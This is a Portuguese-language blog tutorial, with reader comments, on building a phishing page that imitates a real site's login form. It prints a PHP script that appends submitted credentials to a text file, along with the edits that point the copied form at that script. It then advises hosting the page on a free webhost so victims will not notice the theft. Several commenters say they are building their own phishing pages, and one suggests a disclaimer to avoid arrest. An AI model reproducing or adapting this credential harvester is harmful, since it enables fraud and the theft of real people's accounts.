Tutorial – Criando uma pagina fake de login!

Publicado por Dia 28 de janeiro de 2010 em Tutoriais | 8 Comentários | 9.100 Acessos

Tenho postado sobre phishing e o atacante utilizando técnicas para espalhar seus sites de phishing. Agora, vamos ver como eles criam essas páginas de phishing em primeiro lugar com o passo-a-passo. O Conhecimento de PHP e HTML será muito útil para criar páginas de login falso

Tutorial - Criando pagina fake de login.

1-  Selecione um site de destino e navegue até a página de login.

2- Salve a página inteira indo em Arquivo-> Salvar como .. (Estou fazendo isso no Firefox .)
3- Você terá agora um arquivo HTML e uma pasta cheia de imagens e talvez alguns arquivos JavaScript.  Renomeie o arquivo HTML para index.html e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.
4-  Crie um arquivo PHP com o nome “phish.php
5- Cole o seguinte código para o arquivo PHP (phish.php)  que você  já fez. Este código é o que leva os detalhes de login e os armazena no arquivo “lista.txt“, e depois redireciona para o site real. Desta forma, o usuário vai pensar que ele colocou as informações de login errado e terá êxito, a segunda vez que ele for  tentar se logar o site se redirecionara para o  site real. Fazendo assim com que a vitima nem perceba que seus dados foram roubados.
<?php

$handle = fopen("lista.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");

fclose($handle);
exit;
?>
6. Agora temos que apontar o formulário de login no arquivo HTML para o arquivo PHP (phish.php).  Localize o código do formulário no arquivo HTML e alterar o link de ação para o arquivo PHP e do tipo de método de começar assim que as informações apresentadas são passados através da URL. O código HTML deve começar com algo como isto:
<form action = sitelink ” . com o método = “GET”>
altere para:
<form action = http://www.site.com/phish.php ” . com o método = “GET”>
Ou:
<form action = phish.php ” . com o método = “GET”>
7. Quando tudo estiver concluído,  faça o upload dos arquivos para um webhost gratuito que suporte PHP.
8.  Você acabou de criar uma página de phishing.
Autor: Diablos 4-Ever
Tags: ,
4 votes, average: 4,25 out of 54 votes, average: 4,25 out of 54 votes, average: 4,25 out of 54 votes, average: 4,25 out of 54 votes, average: 4,25 out of 5 (4 votos, média: 4,25 por 5)
You need to be a registered member to rate this post.
Loading ... Loading ...

Sobre Diablos 4-Ever

Eu não exploro as falhas, São as falhas que me exploram.
Inscreva-se no RSS Feed dos comentários desta postagem

8 Respostas

  1. hilton
    15 de junho de 2010 at 3:33 PM
    Como configurar o Wamp server corretamente?
  2. Bruno
    20 de setembro de 2010 at 7:19 PM
    Pow cara muito mas muito bom mesmo seus tutoriais.
    Apenas não entendi uam parte >> e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.<<<
    Se puder exclarecer agradeço. ^^
  3. prankinho
    8 de dezembro de 2010 at 5:05 PM
    vlws cara belo tutorial tó tentando criar minha pagina de phishing aqui ^^
  4. Anti.Peace
    6 de janeiro de 2011 at 6:21 PM
    Kra uma dica sempre q vc postar algo coloque algo como “Atenção: este texto é somente para aprendizado proprio não nos responabilizamos por seus atos” isso ajuda se um dia vc for preso…
  5. Dido
    7 de janeiro de 2011 at 7:30 PM
    Eu fiz tudo bem, mas não sei que webhost free devo usar =(, além de você não ter dado nenhuma dica sobre o webhost, se tiver a gentileza de me recomendar um free fazia-me um grande favor vlw

    responda se for possivel cara, grande site continue o bom trabalho.

  6. andre
    13 de outubro de 2011 at 3:02 PM
    ahh deu certo karaka mano isso deu certo mesmo muito obrigado galera se vcs quizerem explicaçao melho mi add no msn andrekrazx01@hotmail.com
  7. DEVASTADOR
    28 de outubro de 2011 at 7:30 PM
    Man,vlw mas o cara aew @Anti.Peace ja flw tudo,tem que colocar “Nao se responsabilizo pelos esus atos..”

Leave a Reply

O seu endereço de email não será publicado Campos obrigatórios são marcados *

*
*